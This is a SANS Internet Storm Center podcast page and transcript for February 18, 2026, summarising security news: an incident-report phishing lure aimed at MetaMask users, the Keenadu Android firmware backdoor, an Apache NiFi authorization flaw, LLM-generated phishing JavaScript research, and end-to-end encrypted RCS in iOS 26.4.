Podcast Detail

SANS Stormcast Wednesday, February 18th, 2026: IR Phishing; Neenadu Android Backdoor; NiFi Bugs; LLMs Phishing; Encrypted RCS

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9814.mp3

previous
Podcast Logo
IR Phishing; Neenadu Android Backdoor; NiFi Bugs; LLMs Phishing; Encrypted RCS
00:00

Fake Incident Report Used in Phishing Campaign
https://isc.sans.edu/diary/Fake%20Incident%20Report%20Used%20in%20Phishing%20Campaign/32722

Divide and conquer: how the new Keenadu backdoor exposed links between major Android botnets
https://securelist.com/keenadu-android-backdoor/118913/

CVE-2026-25903: Apache NiFi: Missing Authorization of Restricted Permissions for Component Updates
https://seclists.org/oss-sec/2026/q1/166

The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time
https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/

Encrypted RCS in iOS/iPadOS
https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-26_4-release-notes

Podcast Transcript

 Hello and welcome to the Wednesday, February 18th, 2026
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu credit certificate program in
 incident response. Just a quick note for those of you
 who are watching this on YouTube, sorry, no camera
 today having some little technical issues. Today's
 diary is coming from Xavier again. He's on a roll lately
 and this latest one is a little bit of different
 phishing campaign. One of the goals of phishing campaigns is
 always to create some urgency to make you do something
 quickly because, well, there is some kind of emergency and
 what they're doing here is essentially pretending that
 there was an incident, some odd login to your crypto
 wallet that would cause you to now implement two-factor
 authentication. Not sure if they just assume that you
 didn't do it or if they think that you may ignore if you
 already have two-factor authentication enabled. This
 particular phishing email did affect MetaMask users. No
 indication here that MetaMask is at all involved in this. So
 this is not a MetaMask breach or anything like this. They're
 just sending this to random people on the internet hoping
 that they will get some actual MetaMask users that will then
 fall for this phishing email. And as usual, cryptocurrency
 wallets are still one of the top targets of these kind of
 phishing emails. And the Android ecosystem continues to
 be haunted by devices that come reinstalled with
 malicious firmware. Kaspersky has the latest document
 incident of this. They call it the Kinado Big Door and
 apparently it was reinstalled on these affected devices and
 was added during the build phase for the firmware. Now,
 we have seen sort of various picture frames and such with
 compromised firmware in the past. And what often happens
 is that systems on the production lines or so are
 getting infected and then being used to install these
 malicious back doors. The takedown here of this back
 door, I should rather say the reverse analysis of it is
 rather neat. So real good work here by Kaspersky, helping us
 understand what the particular back door does and also how
 they analyzed this malicious code. And then we have a new
 vulnerability in Apache's NiFi data processing service. This
 particular software, well, if you have seen it being
 attacked before, that's why I mentioned it here. It's one of
 those data processing pipelines. It's written in
 Java and presents a nice web -based admin interface that
 allows you to sort of, you know, to sort of, you know,
 add different components to extract data and then send it
 out in a standard format. So often used for things like
 machine learning or such in order to pre-prepare various
 data sets and such to be easily imported in your
 particular machine learning pipeline. Well, the problem
 here is that even if you did require permissions for
 particular components that you sort of have configured that
 may be bypassed and this restricted annotation that
 indicates that additional privileges are required, may
 be ignored. So I mentioned before with NiFi, it's not
 really one of those systems that you really want to expose
 to the internet. Where I do see it exposed to the internet
 is where you have data scientists and such that set
 it up on a cloud server without necessarily
 understanding the security implications of doing so. So
 definitely one of those things you want to get a handle on
 and if possible catalog these installs. And Palo Alto's Unit
 42 came up with an interesting abuse case for large language
 models. The trick here is where you're actually using
 the large language model to create phishing pages. The way
 this works is where the victim is basically being tricked
 into sending a prompt to the large language model that will
 then return the javascript that is then being used to
 create the phishing page. The reason is interesting is that
 first of all the malicious javascript is now coming from
 an overall trusted site that basically is often whitelisted
 and as such you know not filtered and inspected that
 carefully. And secondly that the user also doesn't
 necessarily get sort of the usual warning messages that
 would accompany any phishing message and phishing webpage
 like that. So a pretty interesting trick. It's
 currently not used in the wild. This is really sort of
 just some threat research but they do show a proof of
 concept how this could happen and how this could be
 implemented. So probably not too long before we see
 something like this in the wild. And as so often you must
 sort of put some controls around data being sent to and
 from these large language models if it's not for
 phishing at least for things like data exfiltration that
 often happens accidentally with those sites. And then we
 have an interesting update from Apple for its next
 release of iOS and iPadOS. Apple just released iOS and
 iPadOS 26.3 and now released public betas for 26.4. 26.4.
 26.4 introduces end-to-end encryption for RCS. RCS is
 well supposed to replace SMS at one point and essentially
 fixes some of the security problems that we had with SMS.
 SMS was in the clear not authenticated so not really
 suitable for anything of any security relevance. Well with
 RCS some of these issues are supposed to be fixed but this
 depends on vendors actually implementing these features in
 their operating systems. Apple has initially been a little
 bit slow in sort of jumping on the RCS bandwagon here. But
 they are supporting it currently however only some of
 the basic features like markup and other sort of more look
 and feel features of RCS. With this edition of end-to-end
 encryption there's a good chance that in the next
 version of iOS iPadOS, which will probably come out in a
 month or so, will see some of these more advanced security
 features show up in iOS iPadOS as well. And of course in
 order to actually use these features sort of in your
 applications you probably want at least iOS and Android
 support to get a good coverage for most of your users
 devices. Well and this is it for today so thanks again for
 listening. Sorry again for no camera today and hopefully
 I'll have it fixed tomorrow. So talk to you again tomorrow.
 Bye.